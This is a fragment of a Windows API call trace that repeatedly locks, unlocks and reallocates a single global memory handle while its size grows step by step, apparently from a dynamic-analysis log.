[0117.283] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.283] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.283] GlobalUnlock (hMem=0x146000c) returned 0
[0117.283] GlobalReAlloc (hMem=0x146000c, dwBytes=0x30000, uFlags=0x2) returned 0x146000c
[0117.283] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.284] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.284] GlobalUnlock (hMem=0x146000c) returned 0
[0117.284] GlobalReAlloc (hMem=0x146000c, dwBytes=0x32000, uFlags=0x2) returned 0x146000c
[0117.284] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.284] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.284] GlobalUnlock (hMem=0x146000c) returned 0
[0117.284] GlobalReAlloc (hMem=0x146000c, dwBytes=0x34000, uFlags=0x2) returned 0x146000c
[0117.284] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.285] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.285] GlobalUnlock (hMem=0x146000c) returned 0
[0117.285] GlobalReAlloc (hMem=0x146000c, dwBytes=0x36000, uFlags=0x2) returned 0x146000c
[0117.285] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.285] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.285] GlobalUnlock (hMem=0x146000c) returned 0
[0117.285] GlobalReAlloc (hMem=0x146000c, dwBytes=0x38000, uFlags=0x2) returned 0x146000c
[0117.285] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.286] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.286] GlobalUnlock (hMem=0x146000c) returned 0
[0117.286] GlobalReAlloc (hMem=0x146000c, dwBytes=0x3a000, uFlags=0x2) returned 0x146000c
[0117.286] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.286] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.286] GlobalUnlock (hMem=0x146000c) returned 0
[0117.286] GlobalReAlloc (hMem=0x146000c, dwBytes=0x3c000, uFlags=0x2) returned 0x146000c
[0117.286] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.287] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.287] GlobalUnlock (hMem=0x146000c) returned 0
[0117.287] GlobalReAlloc (hMem=0x146000c, dwBytes=0x3e000, uFlags=0x2) returned 0x146000c
[0117.287] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.287] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.287] GlobalUnlock (hMem=0x146000c) returned 0
[0117.287] GlobalReAlloc (hMem=0x146000c, dwBytes=0x40000, uFlags=0x2) returned 0x146000c
[0117.287] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.288] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.288] GlobalUnlock (hMem=0x146000c) returned 0
[0117.288] GlobalReAlloc (hMem=0x146000c, dwBytes=0x42000, uFlags=0x2) returned 0x146000c
[0117.288] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.288] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.288] GlobalUnlock (hMem=0x146000c) returned 0
[0117.288] GlobalReAlloc (hMem=0x146000c, dwBytes=0x44000, uFlags=0x2) returned 0x146000c
[0117.288] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.289] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.289] GlobalUnlock (hMem=0x146000c) returned 0
[0117.289] GlobalReAlloc (hMem=0x146000c, dwBytes=0x46000, uFlags=0x2) returned 0x146000c
[0117.289] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.289] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.289] GlobalUnlock (hMem=0x146000c) returned 0
[0117.289] GlobalReAlloc (hMem=0x146000c, dwBytes=0x48000, uFlags=0x2) returned 0x146000c
[0117.289] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.294] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.295] GlobalUnlock (hMem=0x146000c) returned 0
[0117.295] GlobalReAlloc (hMem=0x146000c, dwBytes=0x4a000, uFlags=0x2) returned 0x146000c
[0117.295] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.295] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.295] GlobalUnlock (hMem=0x146000c) returned 0
[0117.295] GlobalReAlloc (hMem=0x146000c, dwBytes=0x4c000, uFlags=0x2) returned 0x146000c
[0117.295] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.296] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.296] GlobalUnlock (hMem=0x146000c) returned 0
[0117.296] GlobalReAlloc (hMem=0x146000c, dwBytes=0x4e000, uFlags=0x2) returned 0x146000c
[0117.296] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.296] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.296] GlobalUnlock (hMem=0x146000c) returned 0
[0117.296] GlobalReAlloc (hMem=0x146000c, dwBytes=0x50000, uFlags=0x2) returned 0x146000c
[0117.296] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.296] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.297] GlobalUnlock (hMem=0x146000c) returned 0
[0117.297] GlobalReAlloc (hMem=0x146000c, dwBytes=0x52000, uFlags=0x2) returned 0x146000c
[0117.297] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.297] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.297] GlobalUnlock (hMem=0x146000c) returned 0
[0117.297] GlobalReAlloc (hMem=0x146000c, dwBytes=0x54000, uFlags=0x2) returned 0x146000c
[0117.297] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.297] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.297] GlobalUnlock (hMem=0x146000c) returned 0
[0117.298] GlobalReAlloc (hMem=0x146000c, dwBytes=0x56000, uFlags=0x2) returned 0x146000c
[0117.298] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.298] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.298] GlobalUnlock (hMem=0x146000c) returned 0
[0117.298] GlobalReAlloc (hMem=0x146000c, dwBytes=0x58000, uFlags=0x2) returned 0x146000c
[0117.298] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.298] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.298] GlobalUnlock (hMem=0x146000c) returned 0
[0117.298] GlobalReAlloc (hMem=0x146000c, dwBytes=0x5a000, uFlags=0x2) returned 0x146000c
[0117.299] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.299] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.299] GlobalUnlock (hMem=0x146000c) returned 0
[0117.299] GlobalReAlloc (hMem=0x146000c, dwBytes=0x5c000, uFlags=0x2) returned 0x146000c
[0117.299] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.299] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.299] GlobalUnlock (hMem=0x146000c) returned 0
[0117.299] GlobalReAlloc (hMem=0x146000c, dwBytes=0x5e000, uFlags=0x2) returned 0x146000c
[0117.299] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.300] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.300] GlobalUnlock (hMem=0x146000c) returned 0
[0117.300] GlobalReAlloc (hMem=0x146000c, dwBytes=0x60000, uFlags=0x2) returned 0x146000c
[0117.300] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.300] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.300] GlobalUnlock (hMem=0x146000c) returned 0
[0117.300] GlobalReAlloc (hMem=0x146000c, dwBytes=0x62000, uFlags=0x2) returned 0x146000c
[0117.300] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.301] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.301] GlobalUnlock (hMem=0x146000c) returned 0
[0117.301] GlobalReAlloc (hMem=0x146000c, dwBytes=0x64000, uFlags=0x2) returned 0x146000c
[0117.301] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.301] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.301] GlobalUnlock (hMem=0x146000c) returned 0
[0117.301] GlobalReAlloc (hMem=0x146000c, dwBytes=0x66000, uFlags=0x2) returned 0x146000c
[0117.301] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.302] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.302] GlobalUnlock (hMem=0x146000c) returned 0
[0117.302] GlobalReAlloc (hMem=0x146000c, dwBytes=0x68000, uFlags=0x2) returned 0x146000c
[0117.302] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.302] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.302] GlobalUnlock (hMem=0x146000c) returned 0
[0117.302] GlobalReAlloc (hMem=0x146000c, dwBytes=0x6a000, uFlags=0x2) returned 0x146000c
[0117.302] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.303] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.303] GlobalUnlock (hMem=0x146000c) returned 0
[0117.303] GlobalReAlloc (hMem=0x146000c, dwBytes=0x6c000, uFlags=0x2) returned 0x146000c
[0117.309] GlobalLock (hMem=0x146000c) returned 0x310820
[0117.309] GlobalHandle (pMem=0x310820) returned 0x146000c
[0117.309] GlobalUnlock (hMem=0x146000c) returned 0
[0117.309] GlobalReAlloc (hMem=0x146000c, dwBytes=0x6e000, uFlags=0x2) returned 0x146000c
[0117.309] GlobalLock (hMem=0x146000c) returned 0x310820
[0117.310] GlobalHandle (pMem=0x310820) returned 0x146000c
[0117.310] GlobalUnlock (hMem=0x146000c) returned 0
[0117.310] GlobalReAlloc (hMem=0x146000c, dwBytes=0x70000, uFlags=0x2) returned 0x146000c
[0117.323] GlobalLock (hMem=0x146000c) returned 0x2420048
[0117.323] GlobalHandle (pMem=0x2420048) returned 0x146000c
[0117.324] GlobalUnlock (hMem=0x146000c) returned 0
[0117.324] GlobalReAlloc (hMem=0x146000c, dwBytes=0x72000, uFlags=0x2) returned 0x146000c
[0117.329] GlobalLock (hMem=0x146000c) returned 0x2490058
[0117.330] GlobalHandle (pMem=0x2490058) returned 0x146000c
[0117.330] GlobalUnlock (hMem=0x146000c) returned 0
[0117.330] GlobalReAlloc (hMem=0x146000c, dwBytes=0x74000, uFlags=0x2) returned 0x146000c
[0117.330] GlobalLock (hMem=0x146000c) returned 0x2490058
[0117.330] GlobalHandle (pMem=0x2490058) returned 0x146000c
[0117.331] GlobalUnlock (hMem=0x146000c) returned 0
[0117.331] GlobalReAlloc (hMem=0x146000c, dwBytes=0x76000, uFlags=0x2) returned 0x146000c
[0117.410] GlobalLock (hMem=0x146000c) returned 0x2a6810
[0117.411] GlobalHandle (pMem=0x2a6810) returned 0x146000c
[0117.411] GlobalUnlock (hMem=0x146000c) returned 0
[0117.411] GlobalReAlloc (hMem=0x146000c, dwBytes=0x78000, uFlags=0x2) returned 0x146000c
[0117.417] GlobalLock (hMem=0x146000c) returned 0x2420048
[0117.418] GlobalHandle (pMem=0x2420048) returned 0x146000c
[0117.418] GlobalUnlock (hMem=0x146000c) returned 0
[0117.418] GlobalReAlloc (hMem=0x146000c, dwBytes=0x7a000, uFlags=0x2) returned 0x146000c
[0117.424] GlobalLock (hMem=0x146000c) returned 0x2498058
[0117.425] GlobalHandle (pMem=0x2498058) returned 0x146000c
[0117.425] GlobalUnlock (hMem=0x146000c) returned 0
[0117.425] GlobalReAlloc (hMem=0x146000c, dwBytes=0x7c000, uFlags=0x2) returned 0x146000c
[0117.425] GlobalLock (hMem=0x146000c) returned 0x2498058
[0117.425] GlobalHandle (pMem=0x2498058) returned 0x146000c
[0117.425] GlobalUnlock (hMem=0x146000c) returned 0
[0117.425] GlobalReAlloc (hMem=0x146000c, dwBytes=0x7e000, uFlags=0x2) returned 0x146000c
[0117.439] GlobalLock (hMem=0x146000c) returned 0x2520048
[0117.440] GlobalHandle (pMem=0x2520048) returned 0x146000c
[0117.440] GlobalUnlock (hMem=0x146000c) returned 0
[0117.440] GlobalReAlloc (hMem=0x146000c, dwBytes=0x80000, uFlags=0x2) returned 0x146000c
[0117.472] GlobalLock (hMem=0x146000c) returned 0x14e0020
[0117.473] GlobalHandle (pMem=0x14e0020) returned 0x146000c
[0117.473] GlobalUnlock (hMem=0x146000c) returned 0
[0117.473] GlobalReAlloc (hMem=0x146000c, dwBytes=0x82000, uFlags=0x2) returned 0x146000c
[0117.484] GlobalLock (hMem=0x146000c) returned 0x2720020
[0117.485] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0117.485] GlobalUnlock (hMem=0x146000c) returned 0
[0117.485] GlobalReAlloc (hMem=0x146000c, dwBytes=0x84000, uFlags=0x2) returned 0x146000c
[0117.495] GlobalLock (hMem=0x146000c) returned 0x14e0020
[0117.496] GlobalHandle (pMem=0x14e0020) returned 0x146000c
[0117.496] GlobalUnlock (hMem=0x146000c) returned 0
[0117.496] GlobalReAlloc (hMem=0x146000c, dwBytes=0x86000, uFlags=0x2) returned 0x146000c
[0117.507] GlobalLock (hMem=0x146000c) returned 0x2720020
[0117.508] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0117.508] GlobalUnlock (hMem=0x146000c) returned 0
[0117.508] GlobalReAlloc (hMem=0x146000c, dwBytes=0x88000, uFlags=0x2) returned 0x146000c
[0117.519] GlobalLock (hMem=0x146000c) returned 0x14e0020
[0117.520] GlobalHandle (pMem=0x14e0020) returned 0x146000c
[0117.520] GlobalUnlock (hMem=0x146000c) returned 0
[0117.520] GlobalReAlloc (hMem=0x146000c, dwBytes=0x8a000, uFlags=0x2) returned 0x146000c
[0117.531] GlobalLock (hMem=0x146000c) returned 0x2720020
[0117.532] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0117.532] GlobalUnlock (hMem=0x146000c) returned 0
[0117.532] GlobalReAlloc (hMem=0x146000c, dwBytes=0x8c000, uFlags=0x2) returned 0x146000c
[0117.561] GlobalLock (hMem=0x146000c) returned 0x14e0020
[0117.562] GlobalHandle (pMem=0x14e0020) returned 0x146000c
[0117.562] GlobalUnlock (hMem=0x146000c) returned 0
[0117.562] GlobalReAlloc (hMem=0x146000c, dwBytes=0x8e000, uFlags=0x2) returned 0x146000c
[0117.573] GlobalLock (hMem=0x146000c) returned 0x2720020
[0117.574] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0117.574] GlobalUnlock (hMem=0x146000c) returned 0
[0117.574] GlobalReAlloc (hMem=0x146000c, dwBytes=0x90000, uFlags=0x2) returned 0x146000c
[0117.585] GlobalLock (hMem=0x146000c) returned 0x14e0020
[0117.586] GlobalHandle (pMem=0x14e0020) returned 0x146000c
[0117.586] GlobalUnlock (hMem=0x146000c) returned 0
[0117.586] GlobalReAlloc (hMem=0x146000c, dwBytes=0x92000, uFlags=0x2) returned 0x146000c
[0117.598] GlobalLock (hMem=0x146000c) returned 0x2720020
[0117.600] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0117.600] GlobalUnlock (hMem=0x146000c) returned 0
[0117.600] GlobalReAlloc (hMem=0x146000c, dwBytes=0x94000, uFlags=0x2) returned 0x146000c
[0117.659] GlobalLock (hMem=0x146000c) returned 0x14e0020
[0117.660] GlobalHandle (pMem=0x14e0020) returned 0x146000c
[0117.660] GlobalUnlock (hMem=0x146000c) returned 0
[0117.660] GlobalReAlloc (hMem=0x146000c, dwBytes=0x96000, uFlags=0x2) returned 0x146000c
[0117.672] GlobalLock (hMem=0x146000c) returned 0x2720020
[0117.673] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0117.673] GlobalUnlock (hMem=0x146000c) returned 0
[0117.673] GlobalReAlloc (hMem=0x146000c, dwBytes=0x98000, uFlags=0x2) returned 0x146000c
[0117.685] GlobalLock (hMem=0x146000c) returned 0x14e0020
[0117.686] GlobalHandle (pMem=0x14e0020) returned 0x146000c
[0117.686] GlobalUnlock (hMem=0x146000c) returned 0
[0117.686] GlobalReAlloc (hMem=0x146000c, dwBytes=0x9a000, uFlags=0x2) returned 0x146000c
[0117.746] GlobalLock (hMem=0x146000c) returned 0x2720020
[0117.747] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0117.747] GlobalUnlock (hMem=0x146000c) returned 0
[0117.747] GlobalReAlloc (hMem=0x146000c, dwBytes=0x9c000, uFlags=0x2) returned 0x146000c
[0117.760] GlobalLock (hMem=0x146000c) returned 0x14e0020
[0117.760] GlobalHandle (pMem=0x14e0020) returned 0x146000c
[0117.760] GlobalUnlock (hMem=0x146000c) returned 0
[0117.760] GlobalReAlloc (hMem=0x146000c, dwBytes=0x9e000, uFlags=0x2) returned 0x146000c
[0117.774] GlobalLock (hMem=0x146000c) returned 0x2720020
[0117.774] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0117.774] GlobalUnlock (hMem=0x146000c) returned 0
[0117.774] GlobalReAlloc (hMem=0x146000c, dwBytes=0xa0000, uFlags=0x2) returned 0x146000c
[0117.787] GlobalLock (hMem=0x146000c) returned 0x14e0020
[0117.788] GlobalHandle (pMem=0x14e0020) returned 0x146000c
[0117.788] GlobalUnlock (hMem=0x146000c) returned 0
[0117.788] GlobalReAlloc (hMem=0x146000c, dwBytes=0xa2000, uFlags=0x2) returned 0x146000c
[0117.848] GlobalLock (hMem=0x146000c) returned 0x2720020
[0117.849] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0117.849] GlobalUnlock (hMem=0x146000c) returned 0
[0117.849] GlobalReAlloc (hMem=0x146000c, dwBytes=0xa4000, uFlags=0x2) returned 0x146000c
[0117.863] GlobalLock (hMem=0x146000c) returned 0x14e0020
[0117.864] GlobalHandle (pMem=0x14e0020) returned 0x146000c
[0117.864] GlobalUnlock (hMem=0x146000c) returned 0
[0117.864] GlobalReAlloc (hMem=0x146000c, dwBytes=0xa6000, uFlags=0x2) returned 0x146000c
[0117.878] GlobalLock (hMem=0x146000c) returned 0x2720020
[0117.879] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0117.879] GlobalUnlock (hMem=0x146000c) returned 0
[0117.879] GlobalReAlloc (hMem=0x146000c, dwBytes=0xa8000, uFlags=0x2) returned 0x146000c
[0117.942] GlobalLock (hMem=0x146000c) returned 0x14e0020
[0117.942] GlobalHandle (pMem=0x14e0020) returned 0x146000c
[0117.942] GlobalUnlock (hMem=0x146000c) returned 0
[0117.942] GlobalReAlloc (hMem=0x146000c, dwBytes=0xaa000, uFlags=0x2) returned 0x146000c
[0117.956] GlobalLock (hMem=0x146000c) returned 0x2720020
[0117.957] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0117.957] GlobalUnlock (hMem=0x146000c) returned 0
[0117.957] GlobalReAlloc (hMem=0x146000c, dwBytes=0xac000, uFlags=0x2) returned 0x146000c
[0117.971] GlobalLock (hMem=0x146000c) returned 0x14e0020
[0117.971] GlobalHandle (pMem=0x14e0020) returned 0x146000c
[0117.971] GlobalUnlock (hMem=0x146000c) returned 0
[0117.971] GlobalReAlloc (hMem=0x146000c, dwBytes=0xae000, uFlags=0x2) returned 0x146000c
[0118.031] GlobalLock (hMem=0x146000c) returned 0x2720020
[0118.032] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0118.032] GlobalUnlock (hMem=0x146000c) returned 0
[0118.032] GlobalReAlloc (hMem=0x146000c, dwBytes=0xb0000, uFlags=0x2) returned 0x146000c
[0118.046] GlobalLock (hMem=0x146000c) returned 0x14e0020
[0118.047] GlobalHandle (pMem=0x14e0020) returned 0x146000c
[0118.047] GlobalUnlock (hMem=0x146000c) returned 0
[0118.047] GlobalReAlloc (hMem=0x146000c, dwBytes=0xb2000, uFlags=0x2) returned 0x146000c
[0118.061] GlobalLock (hMem=0x146000c) returned 0x2720020
[0118.062] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0118.062] GlobalUnlock (hMem=0x146000c) returned 0
[0118.062] GlobalReAlloc (hMem=0x146000c, dwBytes=0xb4000, uFlags=0x2) returned 0x146000c
[0118.125] GlobalLock (hMem=0x146000c) returned 0x14e0020
[0118.125] GlobalHandle (pMem=0x14e0020) returned 0x146000c
[0118.125] GlobalUnlock (hMem=0x146000c) returned 0
[0118.125] GlobalReAlloc (hMem=0x146000c, dwBytes=0xb6000, uFlags=0x2) returned 0x146000c
[0118.140] GlobalLock (hMem=0x146000c) returned 0x2720020
[0118.141] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0118.141] GlobalUnlock (hMem=0x146000c) returned 0
[0118.141] GlobalReAlloc (hMem=0x146000c, dwBytes=0xb8000, uFlags=0x2) returned 0x146000c
[0118.156] GlobalLock (hMem=0x146000c) returned 0x14e0020
[0118.157] GlobalHandle (pMem=0x14e0020) returned 0x146000c
[0118.157] GlobalUnlock (hMem=0x146000c) returned 0
[0118.157] GlobalReAlloc (hMem=0x146000c, dwBytes=0xba000, uFlags=0x2) returned 0x146000c
[0118.218] GlobalLock (hMem=0x146000c) returned 0x2720020
[0118.219] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0118.219] GlobalUnlock (hMem=0x146000c) returned 0
[0118.219] GlobalReAlloc (hMem=0x146000c, dwBytes=0xbc000, uFlags=0x2) returned 0x146000c
[0118.234] GlobalLock (hMem=0x146000c) returned 0x14e0020
[0118.235] GlobalHandle (pMem=0x14e0020) returned 0x146000c
[0118.235] GlobalUnlock (hMem=0x146000c) returned 0
[0118.235] GlobalReAlloc (hMem=0x146000c, dwBytes=0xbe000, uFlags=0x2) returned 0x146000c
[0118.250] GlobalLock (hMem=0x146000c) returned 0x2720020
[0118.251] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0118.251] GlobalUnlock (hMem=0x146000c) returned 0
[0118.251] GlobalReAlloc (hMem=0x146000c, dwBytes=0xc0000, uFlags=0x2) returned 0x146000c
[0118.314] GlobalLock (hMem=0x146000c) returned 0x27e0020
[0118.315] GlobalHandle (pMem=0x27e0020) returned 0x146000c
[0118.315] GlobalUnlock (hMem=0x146000c) returned 0
[0118.315] GlobalReAlloc (hMem=0x146000c, dwBytes=0xc2000, uFlags=0x2) returned 0x146000c
[0118.331] GlobalLock (hMem=0x146000c) returned 0x28b0020
[0118.331] GlobalHandle (pMem=0x28b0020) returned 0x146000c
[0118.331] GlobalUnlock (hMem=0x146000c) returned 0
[0118.331] GlobalReAlloc (hMem=0x146000c, dwBytes=0xc4000, uFlags=0x2) returned 0x146000c
[0118.347] GlobalLock (hMem=0x146000c) returned 0x2720020
[0118.348] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0118.348] GlobalUnlock (hMem=0x146000c) returned 0
[0118.348] GlobalReAlloc (hMem=0x146000c, dwBytes=0xc6000, uFlags=0x2) returned 0x146000c
[0118.411] GlobalLock (hMem=0x146000c) returned 0x27f0020
[0118.412] GlobalHandle (pMem=0x27f0020) returned 0x146000c
[0118.412] GlobalUnlock (hMem=0x146000c) returned 0
[0118.412] GlobalReAlloc (hMem=0x146000c, dwBytes=0xc8000, uFlags=0x2) returned 0x146000c
[0118.435] GlobalLock (hMem=0x146000c) returned 0x2720020
[0118.436] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0118.436] GlobalUnlock (hMem=0x146000c) returned 0
[0118.436] GlobalReAlloc (hMem=0x146000c, dwBytes=0xca000, uFlags=0x2) returned 0x146000c
[0118.500] GlobalLock (hMem=0x146000c) returned 0x27f0020
[0118.501] GlobalHandle (pMem=0x27f0020) returned 0x146000c
[0118.501] GlobalUnlock (hMem=0x146000c) returned 0
[0118.501] GlobalReAlloc (hMem=0x146000c, dwBytes=0xcc000, uFlags=0x2) returned 0x146000c
[0118.516] GlobalLock (hMem=0x146000c) returned 0x2720020
[0118.517] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0118.517] GlobalUnlock (hMem=0x146000c) returned 0
[0118.517] GlobalReAlloc (hMem=0x146000c, dwBytes=0xce000, uFlags=0x2) returned 0x146000c
[0118.536] GlobalLock (hMem=0x146000c) returned 0x27f0020
[0118.537] GlobalHandle (pMem=0x27f0020) returned 0x146000c
[0118.537] GlobalUnlock (hMem=0x146000c) returned 0
[0118.537] GlobalReAlloc (hMem=0x146000c, dwBytes=0xd0000, uFlags=0x2) returned 0x146000c
[0118.601] GlobalLock (hMem=0x146000c) returned 0x28c0020
[0118.602] GlobalHandle (pMem=0x28c0020) returned 0x146000c
[0118.602] GlobalUnlock (hMem=0x146000c) returned 0
[0118.602] GlobalReAlloc (hMem=0x146000c, dwBytes=0xd2000, uFlags=0x2) returned 0x146000c
[0118.621] GlobalLock (hMem=0x146000c) returned 0x2720020
[0118.622] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0118.622] GlobalUnlock (hMem=0x146000c) returned 0
[0118.622] GlobalReAlloc (hMem=0x146000c, dwBytes=0xd4000, uFlags=0x2) returned 0x146000c
[0118.687] GlobalLock (hMem=0x146000c) returned 0x2800020
[0118.688] GlobalHandle (pMem=0x2800020) returned 0x146000c
[0118.688] GlobalUnlock (hMem=0x146000c) returned 0
[0118.688] GlobalReAlloc (hMem=0x146000c, dwBytes=0xd6000, uFlags=0x2) returned 0x146000c
[0118.710] GlobalLock (hMem=0x146000c) returned 0x2720020
[0118.711] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0118.711] GlobalUnlock (hMem=0x146000c) returned 0
[0118.711] GlobalReAlloc (hMem=0x146000c, dwBytes=0xd8000, uFlags=0x2) returned 0x146000c
[0118.779] GlobalLock (hMem=0x146000c) returned 0x2800020
[0118.780] GlobalHandle (pMem=0x2800020) returned 0x146000c
[0118.780] GlobalUnlock (hMem=0x146000c) returned 0
[0118.780] GlobalReAlloc (hMem=0x146000c, dwBytes=0xda000, uFlags=0x2) returned 0x146000c
[0118.803] GlobalLock (hMem=0x146000c) returned 0x2720020
[0118.804] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0118.804] GlobalUnlock (hMem=0x146000c) returned 0
[0118.804] GlobalReAlloc (hMem=0x146000c, dwBytes=0xdc000, uFlags=0x2) returned 0x146000c
[0118.900] GlobalLock (hMem=0x146000c) returned 0x2800020
[0118.901] GlobalHandle (pMem=0x2800020) returned 0x146000c
[0118.901] GlobalUnlock (hMem=0x146000c) returned 0
[0118.901] GlobalReAlloc (hMem=0x146000c, dwBytes=0xde000, uFlags=0x2) returned 0x146000c
[0118.923] GlobalLock (hMem=0x146000c) returned 0x2720020
[0118.924] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0118.924] GlobalUnlock (hMem=0x146000c) returned 0
[0118.924] GlobalReAlloc (hMem=0x146000c, dwBytes=0xe0000, uFlags=0x2) returned 0x146000c
[0119.001] GlobalLock (hMem=0x146000c) returned 0x2800020
[0119.002] GlobalHandle (pMem=0x2800020) returned 0x146000c
[0119.002] GlobalUnlock (hMem=0x146000c) returned 0
[0119.002] GlobalReAlloc (hMem=0x146000c, dwBytes=0xe2000, uFlags=0x2) returned 0x146000c
[0119.020] GlobalLock (hMem=0x146000c) returned 0x28f0020
[0119.020] GlobalHandle (pMem=0x28f0020) returned 0x146000c
[0119.020] GlobalUnlock (hMem=0x146000c) returned 0
[0119.020] GlobalReAlloc (hMem=0x146000c, dwBytes=0xe4000, uFlags=0x2) returned 0x146000c
[0119.086] GlobalLock (hMem=0x146000c) returned 0x2720020
[0119.087] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0119.087] GlobalUnlock (hMem=0x146000c) returned 0
[0119.087] GlobalReAlloc (hMem=0x146000c, dwBytes=0xe6000, uFlags=0x2) returned 0x146000c
[0119.107] GlobalLock (hMem=0x146000c) returned 0x2810020
[0119.108] GlobalHandle (pMem=0x2810020) returned 0x146000c
[0119.108] GlobalUnlock (hMem=0x146000c) returned 0
[0119.108] GlobalReAlloc (hMem=0x146000c, dwBytes=0xe8000, uFlags=0x2) returned 0x146000c
[0119.175] GlobalLock (hMem=0x146000c) returned 0x2720020
[0119.176] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0119.176] GlobalUnlock (hMem=0x146000c) returned 0
[0119.176] GlobalReAlloc (hMem=0x146000c, dwBytes=0xea000, uFlags=0x2) returned 0x146000c
[0119.197] GlobalLock (hMem=0x146000c) returned 0x2810020
[0119.198] GlobalHandle (pMem=0x2810020) returned 0x146000c
[0119.198] GlobalUnlock (hMem=0x146000c) returned 0
[0119.198] GlobalReAlloc (hMem=0x146000c, dwBytes=0xec000, uFlags=0x2) returned 0x146000c
[0119.266] GlobalLock (hMem=0x146000c) returned 0x2720020
[0119.267] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0119.267] GlobalUnlock (hMem=0x146000c) returned 0
[0119.267] GlobalReAlloc (hMem=0x146000c, dwBytes=0xee000, uFlags=0x2) returned 0x146000c
[0119.287] GlobalLock (hMem=0x146000c) returned 0x2810020
[0119.288] GlobalHandle (pMem=0x2810020) returned 0x146000c
[0119.288] GlobalUnlock (hMem=0x146000c) returned 0
[0119.288] GlobalReAlloc (hMem=0x146000c, dwBytes=0xf0000, uFlags=0x2) returned 0x146000c
[0119.354] GlobalLock (hMem=0x146000c) returned 0x2900020
[0119.355] GlobalHandle (pMem=0x2900020) returned 0x146000c
[0119.355] GlobalUnlock (hMem=0x146000c) returned 0
[0119.355] GlobalReAlloc (hMem=0x146000c, dwBytes=0xf2000, uFlags=0x2) returned 0x146000c
[0119.375] GlobalLock (hMem=0x146000c) returned 0x2720020
[0119.376] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0119.376] GlobalUnlock (hMem=0x146000c) returned 0
